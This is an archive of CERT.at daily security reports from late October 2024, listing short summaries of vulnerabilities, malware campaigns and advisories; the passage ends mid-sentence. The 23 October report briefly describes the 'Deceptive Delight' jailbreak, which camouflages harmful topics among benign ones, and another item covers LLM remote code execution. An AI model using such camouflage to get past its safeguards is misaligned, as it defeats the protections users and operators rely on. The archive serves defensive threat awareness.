ausgenutzt: Pwn2Own-Hacker knacken Samsung Galaxy S24 und mehr ∗∗∗ --------------------------------------------- Bei dem Wettbewerb wurden auch diverse Kameras, Drucker und NAS-Systeme attackiert. An ein Pixel 8 oder iPhone 15 hat sich aber niemand rangetraut. --------------------------------------------- https://www.golem.de/news/70-zero-day-luecken-ausgenutzt-pwn2own-hacker-kna… ∗∗∗ The Windows Registry Adventure #4: Hives and the registry layout ∗∗∗ --------------------------------------------- To a normal user or even a Win32 application developer, the registry layout may seem simple: there are five root keys that we know from Regedit (abbreviated as HKCR, HKLM, HKCU, HKU and HKCC), and each of them contains a nested tree structure that serves a specific role in the system. But as one tries to dig deeper and understand how the registry .. --------------------------------------------- https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventu… ∗∗∗ Notorious Hacker Group TeamTNT Launches New Cloud Attacks for Crypto Mining ∗∗∗ --------------------------------------------- The infamous cryptojacking group known as TeamTNT appears to be readying for a new large-scale campaign targeting cloud-native environments for mining cryptocurrencies and renting out breached servers to third-parties."The group is currently .. --------------------------------------------- https://thehackernews.com/2024/10/notorious-hacker-group-teamtnt-launches.h… ∗∗∗ Cybercriminals Pose a Greater Threat of Disruptive US Election Hacks Than Russia or China ∗∗∗ --------------------------------------------- A report distributed by the US Department of Homeland Security warned that financially motivated cybercriminals are more likely to attack US election infrastructure than state-backed hackers. --------------------------------------------- https://www.wired.com/story/cybercriminals-disruptive-hacking-us-elections-… ∗∗∗ Vulnerabilities of Realtek SD card reader driver, part 1 ∗∗∗ --------------------------------------------- These vulnerabilities enable non-privileged users to leak the contents of kernel pool and kernel stack, write to arbitrary kernel memory, and, the most interesting, read and write physical memory from user mode via the DMA capability of the device. The vulnerabilities have remained undisclosed for years, affecting many OEMs, including Dell, .. --------------------------------------------- https://zwclose.github.io/2024/10/14/rtsper1.html ∗∗∗ Inside the Open Directory of the “You Dun” Threat Group ∗∗∗ --------------------------------------------- The DFIR Report’s Threat Intel Team detected an open directory in January 2024 and analyzed it for trade craft and threat actor activity. Once reviewed, we identified it was related to the Chinese speaking hacking group that call themselves “You Dun” .. --------------------------------------------- https://thedfirreport.com/2024/10/28/inside-the-open-directory-of-the-you-d… ∗∗∗ Die NSA empfiehlt wöchentliches Smartphone-Reboot ∗∗∗ --------------------------------------------- Interessante Information, die mir die Woche untergekommen ist. Die US-Sicherheitsbehörde NSA (National Security Agency, Inlandsgeheimdienst) empfiehlt einmal wöchentlich sein Smartphone neu zu starten. Das ganze hat einen sicherheitstechnischen Hintergrund. Durch den Neustart soll Malware, die nicht persistent .. --------------------------------------------- https://www.borncity.com/blog/2024/10/27/die-nsa-empfiehlt-woechentliches-s… ∗∗∗ Anatomy of an LLM RCE ∗∗∗ --------------------------------------------- As large language models (LLMs) become more advanced and are granted additional capabilities by developers, security risks increase dramatically. Manipulated LLMs are no longer just a .. --------------------------------------------- https://www.cyberark.com/resources/threat-research-blog/anatomy-of-an-llm-r… ∗∗∗ Hybrid Russian Espionage and Influence Campaign Aims to Compromise Ukrainian Military Recruits and Deliver Anti-Mobilization Narratives ∗∗∗ --------------------------------------------- In September 2024, Google Threat Intelligence Group (consisting of Google’s Threat Analysis Group (TAG) and Mandiant) discovered UNC5812, a suspected Russian hybrid espionage and influence operation, delivering Windows and Android malware using a Telegram persona named "Civil Defense". "Civil Defense" claims to be a provider of free .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-… ∗∗∗ Secure Coding: Unbefugten Zugriff durch Path Traversal (CWE-22) verhindern ∗∗∗ --------------------------------------------- CWE-22 beschreibt die unsachgemäße Veränderung eines Pfadnamens auf ein eingeschränktes Verzeichnis. Wie lässt sich die Schwachstelle in den Griff bekommen? --------------------------------------------- https://heise.de/-9982270 ∗∗∗ Black Basta-Gruppe nutzt Microsoft Teams-Chatfunktion ∗∗∗ --------------------------------------------- Die als "Black Basta" bekannte Ransomware-Gruppe hat einen neuen Mechanismus entwickelt, der die Chatfunktion von Microsoft Teams zur Kontaktaufnahme ausnutzt. --------------------------------------------- https://heise.de/-9995322 ∗∗∗ Nvidia: Rechteausweitung durch Sicherheitslücken in Grafiktreiber möglich ∗∗∗ --------------------------------------------- Nvidia warnt vor mehreren Sicherheitslücken in den Grafiktreibern, die etwa das Ausweiten der Rechte ermöglichen. Updates stehen bereit. --------------------------------------------- https://heise.de/-9995842 ∗∗∗ Lagebericht 2024: Fast 8 Millionen Mal installierte Malware in Google Play ∗∗∗ --------------------------------------------- IT-Forscher haben die mobile-Malware-Situation der vergangenen 12 Monate untersucht. Mehr als 200 App-Fälschungen lauerten in Google Play. --------------------------------------------- https://heise.de/-9996456 ∗∗∗ VMware Tanzu Spring Security: Umgehung von Autorisierungsregeln möglich ∗∗∗ --------------------------------------------- In VMware Tanzu Spring Security klafft eine kritische Sicherheitslücke, die Angreifern die Umgehung von Autorisierungsregeln ermöglicht. --------------------------------------------- https://heise.de/-9996582 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel, python3.12, and python3.9), Debian (activemq, chromium, libheif, nss, and twisted), Fedora (chromium, dnsdist, dotnet8.0, edk2, glibc, libdigidocpp, mbedtls3.6, NetworkManager-libreswan, oath-toolkit, podman-tui, prometheus-podman-exporter, python-fastapi, python-openapi-core, .. --------------------------------------------- https://lwn.net/Articles/996085/ ∗∗∗ Chatwork Desktop Application (Windows) uses a potentially dangerous function ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN78335885/ ∗∗∗ K000148252: Python tarfile vulnerability CVE-2024-6232 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148252 ∗∗∗ K000148256: libarchive vulnerability CVE-2018-1000880 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148256 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 25.10.2024
by Daily end-of-shift report 25 Oct '24

25 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 24-10-2024 18:00 − Freitag 25-10-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Denial of Service in Cisco ASA & FTD und weitere Cisco Advisories ∗∗∗ --------------------------------------------- Cisco berichtet in einem kürzlich veröffentlichten Advisory, sich "malicious use" einer Denial-of-Service Sicherheitslücke in Cisco Adaptive Security Appliance & Firepower Threat Defense Software Remote Access VPN bewusst zu sein. Berichten nach handelt es sich hierbei aber nicht um gezielte Denial-of-Service Angriffe, sondern um Seiteneffekte von breitgestreuten Brute-Force oder Credential-Spraying Attacken. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/10/denial-of-service-in-cisco-asa-ftd… ∗∗∗ Objektorientiert und weniger redundant: Das BSI stellt den IT-Grundschutz++ vor ∗∗∗ --------------------------------------------- Das BSI hat sich das Ziel gesetzt, den IT-Grundschutz anwenderfreundlicher zu machen. Dafür setzt man auf Maschinenlesbarkeit und eine schlankere Dokumentation. --------------------------------------------- https://heise.de/-9994010 ∗∗∗ AWS Cloud Development Kit Vulnerability Exposes Users to Potential Account Takeover Risks ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed a security flaw impacting Amazon Web Services (AWS) Cloud Development Kit (CDK) that could have resulted in an account takeover under specific circumstances. [..] Following responsible disclosure on June 27, 2024, the issue was addressed by the project maintainers in CDK version 2.149.0 released in July. --------------------------------------------- https://thehackernews.com/2024/10/aws-cloud-development-kit-vulnerability.h… ∗∗∗ NotLockBit: ransomware discovery serves as wake-up call for Mac users ∗∗∗ --------------------------------------------- Historically, Mac users havent had to worry about malware as much as their Windows-using cousins. But that doesnt mean that Mac users should be complacent. And the recent discovery of a new malware strain emphasises that the threat - even if much smaller than on Windows - remains real. --------------------------------------------- https://www.tripwire.com/state-of-security/notlockbit-rransomware-discovery… ∗∗∗ Embargo ransomware: Rock’n’Rust ∗∗∗ --------------------------------------------- Novice ransomware group Embargo is testing and deploying a new Rust-based toolkit --------------------------------------------- https://www.welivesecurity.com/en/eset-research/embargo-ransomware-rocknrus… ∗∗∗ From crisis to confidence: How the University of Rijeka used a network breach to reboot their cybersecurity ∗∗∗ --------------------------------------------- How would your institution respond if a seemingly ordinary system check uncovered a major security incident? That’s exactly what the University of Rijeka faced when a member of the IT team discovered an unauthorised virtual machine template during a routine check — just as a new academic year began. --------------------------------------------- https://connect.geant.org/2024/10/25/from-crisis-to-confidence-how-the-univ… ∗∗∗ Moderne Datenkraken: Smart-TVs tracken sogar HDMI-Inhalte ∗∗∗ --------------------------------------------- Smart-TVs werten sogar dann Bildinhalte aus, wenn ein HDMI-Zuspieler genutzt wird. Die Analysen dienen gezielter Werbung. --------------------------------------------- https://heise.de/-9994787 ∗∗∗ Vonovia in der Kritik: Smarte Rauchmelder bergen Risiko der Spionage ∗∗∗ --------------------------------------------- Die Rauchmelder erfassen allerhand Informationen über die Luftqualität und schicken sie durchs Internet - für Kriminelle ein willkommener Datenschatz. [..] Vonovia selbst verarbeitet die Daten angeblich nur in anonymisierter Form. --------------------------------------------- https://www.golem.de/news/vonovia-in-der-kritik-smarte-rauchmelder-bergen-r… ===================== = Vulnerabilities = ===================== NTR -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 24.10.2024
by Daily end-of-shift report 24 Oct '24

24 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 23-10-2024 18:00 − Donnerstag 24-10-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ New Qilin ransomware encryptor features stronger encryption, evasion ∗∗∗ --------------------------------------------- A new Rust-based variant of the Qilin (Agenda) ransomware strain, dubbed Qilin.B, has been spotted in the wild, featuring stronger encryption, better evasion from security tools, and the ability to disrupt data recovery mechanisms. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-qilin-ransomware-encrypt… ∗∗∗ Neue OpenSSL-Lücke ist gefährlich, aber sehr schwer auszunutzen ∗∗∗ --------------------------------------------- Während SuSE und BSI ein hohes Risiko sehen, verweist das OpenSSL-Projekt auf umfangreiche Vorbedingungen eines Exploits. Vorerst kommen keine Updates. [..] Das Risiko der Lücke mit der CVE-ID CVE-2024-9143 schätzten sie als niedrig ein, weil der Fehler schwierig auszunutzen sei. --------------------------------------------- https://heise.de/-9992067 ∗∗∗ Location tracking of phones is out of control. Here’s how to fight back. ∗∗∗ --------------------------------------------- Unique IDs assigned to Android and iOS devices threaten your privacy. Who knew? You likely have never heard of Babel Street or Location X, but chances are good that they know a lot about you and anyone else you know who keeps a phone nearby around the clock. --------------------------------------------- https://arstechnica.com/information-technology/2024/10/phone-tracking-tool-… ∗∗∗ Investigating volatile data with advanced memory forensics tools – part 1 ∗∗∗ --------------------------------------------- In this two post series I want to highlight how memory forensics plays a crucial role in enhancing forensic investigations. Specifically by providing access to volatile data that cannot be retrieved from storage devices like hard drives. --------------------------------------------- https://www.pentestpartners.com/security-blog/investigating-volatile-data-w… ===================== = Vulnerabilities = ===================== ∗∗∗ Kritische Zero-Day Schwachstelle in FortiManager wird aktiv ausgenutzt - Update verfügbar ∗∗∗ --------------------------------------------- In FortiManager wurde eine kritische Sicherheitslücke entdeckt, die bereits aktiv von Angreifern ausgenutzt wird. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer aus der Ferne, beliebigen Code oder Befehle auszuführen. CVE-2024-47575, CVSS Base Score: 9.8 --------------------------------------------- https://www.cert.at/de/warnungen/2024/10/kritische-zero-day-schwachstelle-i… ∗∗∗ Cisco meldet mehr als 35 Sicherheitslücken in Firewall-Produkten ∗∗∗ --------------------------------------------- Ciscos ASA, Firepower und Secure Firewall Management Center weisen teils kritische Sicherheitslücken auf. Mehr als 35 schließen nun verfügbare Updates. [..] Drei der Sicherheitsmeldungen behandeln als kritisches Risiko eingestufte Sicherheitslücken, elf solche mit hohem Risiko, 21 als mittleren Bedrohungsgrad eingestufte Schwachstellen und eine weitere Meldung hat informativen Charakter ohne Risikobewertung. --------------------------------------------- https://heise.de/-9992639 ∗∗∗ Drupal Security Advisories 2024-10-23 ∗∗∗ --------------------------------------------- Drupal released 5 security advisories. (1 Critical, 3 Moderately Critical, 1 Less Critical) --------------------------------------------- https://www.drupal.org/security ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (grafana, NetworkManager-libreswan, python3.11, and python39:3.9 and python39-devel:3.9), Fedora (dotnet6.0, koji, python-fastapi, python-openapi-core, python-platformio, python-starlette, rust-pyo3, rust-pyo3-build-config, rust-pyo3-ffi, rust-pyo3-macros, rust-pyo3-macros-backend, and yarnpkg), Oracle (grafana, kernel, linux-firmware, NetworkManager-libreswan, and python3.11), Slackware (php81), and SUSE (apache2, buildah, cups-filters, go1.21-openssl, podman, postgresql16, python-pyOpenSSL, and webkit2gtk3). --------------------------------------------- https://lwn.net/Articles/995550/ ∗∗∗ VU#123336: Vulnerable WiFi Alliance example code found in Arcadyan FMIMG51AX000J ∗∗∗ --------------------------------------------- https://kb.cert.org/vuls/id/123336 ∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (October 14, 2024 to October 20, 2024) ∗∗∗ --------------------------------------------- https://www.wordfence.com/blog/2024/10/wordfence-intelligence-weekly-wordpr… ∗∗∗ Unauthentifizierte Path Traversal Schwachstelle in Lawo AG vsm LTC Time Sync (vTimeSync) ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/unauthenticated-path-… ∗∗∗ iniNet Solutions SpiderControl SCADA PC HMI Editor ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-02 ∗∗∗ VIMESA VHF/FM Transmitter Blue Plus ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-01 ∗∗∗ Deep Sea Electronics DSE855 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-03 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 23.10.2024
by Daily end-of-shift report 23 Oct '24

23 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 22-10-2024 18:00 − Mittwoch 23-10-2024 18:00 Handler: Thomas Pribitzer Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ Exploit released for new Windows Server "WinReg" NTLM Relay attack ∗∗∗ --------------------------------------------- Proof-of-concept exploit code is now public for a vulnerability in Microsofts Remote Registry client that could be used to take control of a Windows domain by downgrading the security of the authentication process. --------------------------------------------- https://www.bleepingcomputer.com/news/security/exploit-released-for-new-win… ∗∗∗ Hackers exploit 52 zero-days on the first day of Pwn2Own Ireland ∗∗∗ --------------------------------------------- On the first day of Pwn2Own Ireland, participants demonstrated 52 zero-day vulnerabilities across a range of devices, earning a total of $486,250 in cash prizes. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-exploit-52-zero-days… ∗∗∗ Fortinet warns of new critical FortiManager flaw used in zero-day attacks ∗∗∗ --------------------------------------------- Fortinet publicly disclosed today a critical FortiManager API vulnerability, tracked as CVE-2024-47575, that was exploited in zero-day attacks to steal sensitive files containing configurations, IP addresses, and credentials for managed devices. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critic… ∗∗∗ Android und iOS: Fest codierte Cloud-Zugangsdaten in populären Apps entdeckt ∗∗∗ --------------------------------------------- Betroffen sind mehrere Apps mit teils Millionen von Downloads. Den Entdeckern zufolge gefährdet dies nicht nur Backend-Dienste, sondern auch Nutzerdaten. --------------------------------------------- https://www.golem.de/news/android-und-ios-fest-codierte-cloud-zugangsdaten-… ∗∗∗ Grandoreiro, the global trojan with grandiose ambitions ∗∗∗ --------------------------------------------- In this report, Kaspersky experts analyze recent Grandoreiro campaigns, new targets, tricks, and banking trojan versions. --------------------------------------------- https://securelist.com/grandoreiro-banking-trojan/114257/ ∗∗∗ The Crypto Game of Lazarus APT: Investors vs. Zero-days ∗∗∗ --------------------------------------------- Kaspersky GReAT experts break down the new campaign of Lazarus APT which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain. --------------------------------------------- https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/ ∗∗∗ CISA Warns of Active Exploitation of Microsoft SharePoint Vulnerability (CVE-2024-38094) ∗∗∗ --------------------------------------------- A high-severity flaw impacting Microsoft SharePoint has been added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday, citing evidence of active .. --------------------------------------------- https://thehackernews.com/2024/10/cisa-warns-of-active-exploitation-of.html ∗∗∗ Achtung Fake-Shop: sparhimmel24.de ∗∗∗ --------------------------------------------- sparhimmel24.de ist ein betrügerischer Online-Shop, der Sie mit vermeintlichen Schnäppchen in die Falle lockt. Bestellungen werden trotz Bezahlung nicht geliefert. Wir zeigen Ihnen wie Sie Fake-Shops erkennen und sich vor Betrug schützen können. --------------------------------------------- https://www.watchlist-internet.at/news/achtung-fake-shop-sparhimmel24de ∗∗∗ Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction ∗∗∗ --------------------------------------------- We examine an LLM jailbreaking technique called "Deceptive Delight," a technique that mixes harmful topics with benign ones to trick AIs, with a high success rate.The post Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction appeared first on Unit 42. --------------------------------------------- https://unit42.paloaltonetworks.com/jailbreak-llms-through-camouflage-distr… ∗∗∗ Burning Zero Days: FortiJump FortiManager vulnerability used by nation state in espionage via MSPs ∗∗∗ --------------------------------------------- Did you know there’s widespread exploitation of FortiNet products going on using a zero day, and that there’s no CVE? Now you do. --------------------------------------------- https://doublepulsar.com/burning-zero-days-fortijump-fortimanager-vulnerabi… ∗∗∗ Threat Spotlight: WarmCookie/BadSpace ∗∗∗ --------------------------------------------- WarmCookie is a malware family that emerged in April 2024 and has been distributed via regularly conducted malspam and malvertising campaigns. --------------------------------------------- https://blog.talosintelligence.com/warmcookie-analysis/ ∗∗∗ Sicherheitslücke in Samsung-Android-Treiber wird angegriffen ∗∗∗ --------------------------------------------- Treiber für Samsungs Mobilprozessoren ermöglichen Angreifern das Ausweiten ihrer Rechte. Google warnt vor laufenden Angriffen darauf. --------------------------------------------- https://heise.de/-9991521 ∗∗∗ Public Report: WhatsApp Contacts Security Assessment ∗∗∗ --------------------------------------------- In May 2024, Meta engaged NCC Group’s Cryptography Services practice to perform a cryptography security assessment of selected aspects of the WhatsApp Identity Proof Linked Storage (IPLS) protocol implementation. IPLS underpins the WhatsApp Contacts solution, which aims to store .. --------------------------------------------- https://www.nccgroup.com/us/research-blog/public-report-whatsapp-contacts-s… ===================== = Vulnerabilities = ===================== ∗∗∗ SSA-333468: Multiple Vulnerabilities in InterMesh Subscriber Devices ∗∗∗ --------------------------------------------- InterMesh Subscriber devices contain multiple vulnerabilities that could allow an unauthenticated remote attacker to execute arbitrary code with root privileges. CVSS v4.0 Base Score: 10.0, CVE-2024-47901 --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-333468.html?ste_sid=23… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (dmitry, libheif, and python-sql), Fedora (suricata and wireshark), SUSE (cargo-c, libeverest, protobuf, and qemu), and Ubuntu (golang-1.22, libheif, unbound, and webkit2gtk). --------------------------------------------- https://lwn.net/Articles/995293/ ∗∗∗ 2024-10-21: Cyber Security Advisory - ABB Relion 611, 615, 620, 630 series, REX610, REX640, SMU615, SSC600, Arctic solution, COM600, SPA ZC-400, SUE3000 Guidelines to Prevent Unauthorized Modifications of Firmware and Configuration ∗∗∗ --------------------------------------------- https://search.abb.com/library/Download.aspx?DocumentID=2NGA001911&Language… ∗∗∗ Authenticated Remote Code Execution in multiple Xerox printers ∗∗∗ --------------------------------------------- https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-cod… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 22.10.2024
by Daily end-of-shift report 22 Oct '24

22 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Montag 21-10-2024 18:00 − Dienstag 22-10-2024 18:00 Handler: Thomas Pribitzer Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ FortiManager: Update dichtet offenbar attackiertes Sicherheitsleck ab ∗∗∗ --------------------------------------------- Ohne öffentliche Informationen hat Fortinet Updates für FortiManager veröffentlicht. Sie schließen offenbar attackierte Sicherheitslücken. --------------------------------------------- https://heise.de/-9990393 ∗∗∗ Auch ein .rdp File kann gefährlich sein ∗∗∗ --------------------------------------------- Heute wurde in ganz Europa eine Spear-Phishing Kampagne beobachtet, bei der es darum geht, dass der Empfänger ein angehängtes RDP File öffnen soll. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/10/auch-rdp-file-kann-gefahrlich-sein ∗∗∗ Security Flaw in Styras OPA Exposes NTLM Hashes to Remote Attackers ∗∗∗ --------------------------------------------- Details have emerged about a now-patched security flaw in Styras Open Policy Agent (OPA) that, if successfully exploited, could have led to leakage of New Technology LAN Manager (NTLM) hashes. --------------------------------------------- https://thehackernews.com/2024/10/security-flaw-in-styras-opa-exposes.html ∗∗∗ Pixel perfect Ghostpulse malware loader hides inside PNG image files ∗∗∗ --------------------------------------------- The Ghostpulse malware strain now retrieves its main payload via a PNG image file's pixels. This development, security experts say, is "one of the most significant changes" made by the crooks behind it since launching in 2023. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/10/22/ghostpulse_m… ∗∗∗ OpenSSL 3.4.0 released ∗∗∗ --------------------------------------------- Version 3.4.0 of the OpenSSL SSL/TLS library has been released. It adds anumber of new encryption algorithms, support for "directly fetchedcomposite signature algorithms such as RSA-SHA2-256", and more. See therelease notes for details. --------------------------------------------- https://lwn.net/Articles/995098/ ∗∗∗ Akira ransomware continues to evolve ∗∗∗ --------------------------------------------- As the Akira ransomware group continues to evolve its operations, Talos has the latest research on the groups attack chain, targeted verticals, and potential future TTPs. --------------------------------------------- https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/ ∗∗∗ Threat actor abuses Gophish to deliver new PowerRAT and DCRAT ∗∗∗ --------------------------------------------- Cisco Talos recently discovered a phishing campaign using an open-source phishing toolkit called Gophish by an unknown threat actor. [..] Talos discovered an undocumented PowerShell RAT we’re calling PowerRAT, as one of the payloads and another infamous Remote Access Tool (RAT) DCRAT. --------------------------------------------- https://blog.talosintelligence.com/gophish-powerrat-dcrat/ ∗∗∗ Using gRPC and HTTP/2 for Cryptominer Deployment: An Unconventional Approach ∗∗∗ --------------------------------------------- In this blog entry, we discuss how malicious actors are exploiting Docker remote API servers via gRPC/h2c to deploy the cryptominer SRBMiner to facilitate their mining of XRP on Docker hosts. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/j/using-grpc-http-2-for-crypto… ∗∗∗ Web Application Security for DevOps: Site and Origin Dynamics and Cross-Site Request Forgery ∗∗∗ --------------------------------------------- This is a continuation of the series on web application security where we dive into cookie dynamics. --------------------------------------------- https://www.bitsight.com/blog/web-application-security-devops-site-and-orig… ===================== = Vulnerabilities = ===================== ∗∗∗ VMware fixes bad patch for critical vCenter Server RCE flaw ∗∗∗ --------------------------------------------- VMware has released another security update for CVE-2024-38812, a critical VMware vCenter Server remote code execution vulnerability that was not correctly fixed in the first patch from September 2024. --------------------------------------------- https://www.bleepingcomputer.com/news/security/vmware-fixes-bad-patch-for-c… ∗∗∗ Zyxel security advisory for insufficiently protected credentials vulnerability in firewalls ∗∗∗ --------------------------------------------- The insufficiently protected credentials vulnerability in the CLI command of the USG FLEX H series firewalls could allow an authenticated local attacker to gain privilege escalation by stealing the authentication token of a login administrator. Note that this attack could be successful only if the administrator has not logged out. --------------------------------------------- https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (ffmpeg, ghostscript, libsepol, openjdk-11, openjdk-17, perl, and python-sql), Oracle (389-ds-base, buildah, containernetworking-plugins, edk2, httpd, java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-21-openjdk, kernel, python-setuptools, skopeo, and webkit2gtk3), Red Hat (buildah), Slackware (openssl), SUSE (apache2, firefox, libopenssl-3-devel, podman, and python310-starlette), and Ubuntu (cups-browsed, firefox, libgsf, and linux-gke). --------------------------------------------- https://lwn.net/Articles/995095/ ∗∗∗ Dell Product Security Update Advisory (CVE-2024-45766) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/83995/ ∗∗∗ SolarWinds Product Security Update Advisory (CVE-2024-45711) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/84002/ ∗∗∗ ICONICS and Mitsubishi Electric Products ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-296-01 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 21.10.2024
by Daily end-of-shift report 21 Oct '24

21 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 18-10-2024 18:00 − Montag 21-10-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ New macOS vulnerability, “HM Surf”, could lead to unauthorized data access ∗∗∗ --------------------------------------------- Microsoft Threat Intelligence uncovered a macOS vulnerability that could potentially allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user’s protected data. The vulnerability, which we refer to as “HM Surf”, involves removing the TCC protection for the Safari browser directory and modifying a configuration file in the said directory to gain access to the user’s data, including browsed pages, the device’s camera, microphone, and location, without the user’s consent. [..] Apple released a fix for this vulnerability, now identified as CVE-2024-44133, as part of security updates for macOS Sequoia, released on September 16, 2024. At present, only Safari uses the new protections afforded by TCC. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerab… ∗∗∗ Hooked by the Call: A Deep Dive into The Tricks Used in Callback Phishing Emails ∗∗∗ --------------------------------------------- Previously, Trustwave SpiderLabs covered a massive fake order spam scheme that impersonated a tech support company and propagated via Google Groups. Since then, we have observed more spam campaigns using this hybrid form of cyberattack with varying tactics, techniques, and procedures (TTP). [..] In this blog, we will showcase the different spam techniques used in these phishing emails. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hooked-by-t… ∗∗∗ Hackers Exploit Roundcube Webmail XSS Vulnerability to Steal Login Credentials ∗∗∗ --------------------------------------------- Unknown threat actors have been observed attempting to exploit a now-patched security flaw in the open-source Roundcube webmail software as part of a phishing attack designed to steal user credentials. [..] The attack chain, per Positive Technologies, is an attempt to exploit CVE-2024-37383 (CVSS score: 6.1), a stored cross-site scripting (XSS) vulnerability via SVG animate attributes that allows for execution of arbitrary JavaScript in the context of the victim's web browser. --------------------------------------------- https://thehackernews.com/2024/10/hackers-exploit-roundcube-webmail-xss.html ∗∗∗ Severe flaws in E2EE cloud storage platforms used by millions ∗∗∗ --------------------------------------------- Several end-to-end encrypted (E2EE) cloud storage platforms are vulnerable to a set of security issues that could expose user data to malicious actors. [..] The researchers notified Sync, pCloud, Seafile, and Icedrive of their findings on April 23, 2024, and contacted Tresorit on September 27, 2024, to discuss potential improvements in their particular cryptographic designs. [..] BleepingComputer contacted all five cloud service providers for a comment on Hofmann's and Truong's research, and we received the below statements. --------------------------------------------- https://www.bleepingcomputer.com/news/security/severe-flaws-in-e2ee-cloud-s… ∗∗∗ Open source LLM tool primed to sniff out Python zero-days ∗∗∗ --------------------------------------------- The static analyzer uses Claude AI to identify vulns and suggest exploit code Researchers with Seattle-based Protect AI plan to release a free, open source tool that can find zero-day vulnerabilities in Python codebases with the help of Anthropics Claude AI model. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/10/20/python_zero_… ∗∗∗ Hunting for Remote Management Tools: Detecting RMMs ∗∗∗ --------------------------------------------- Given the wide range of different RMM tools available, performing a threat hunt to identify all different available tools used in the organization brings a couple of challenges. In this blog, we’ll dive a little deeper into how we tackled this challenge and share this knowledge so you can use it to keep your organization safe. --------------------------------------------- https://blog.nviso.eu/2024/10/21/hunting-for-remote-management-tools-detect… ∗∗∗ Cisco bestätigt Attacke auf DevHub-Portal und nimmt es offline ∗∗∗ --------------------------------------------- Cisco hat aktuell laufende Untersuchungen zu einem IT-Sicherheitsvorfall vorangetrieben und nun eine Attacke bestätigt. Dabei sollen Angreifer Zugriff auf nicht für die Öffentlichkeit bestimmte Daten gehabt haben. --------------------------------------------- https://heise.de/-9987412 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (asterisk, chromium, php-horde-mime-viewer, and php-horde-turba), Fedora (apache-commons-io, buildah, chromium, containers-common, libarchive, libdigidocpp, oath-toolkit, podman, rust-hyper-rustls, rust-reqwest, rust-rustls-native-certs, rust-rustls-native-certs0.7, rust-tonic, rust-tonic-build, rust-tonic-types, rust-tower, rust-tower-http, rust-tower-http0.5, rust-tower0.4, thunderbird, and unbound), SUSE (buildah, chromedriver, chromium, element-desktop, element-web, jetty-annotations, nodejs-electron, php7, php74, php8, podman, python3-virtualbox, qemu, thunderbird, and valkey), and Ubuntu (amd64-microcode). --------------------------------------------- https://lwn.net/Articles/994941/ ∗∗∗ Angreifer können PCs mit Virenschutz von Bitdefender und Trend Micro attackieren ∗∗∗ --------------------------------------------- Sicherheitslücken in Virenschutz-Software von 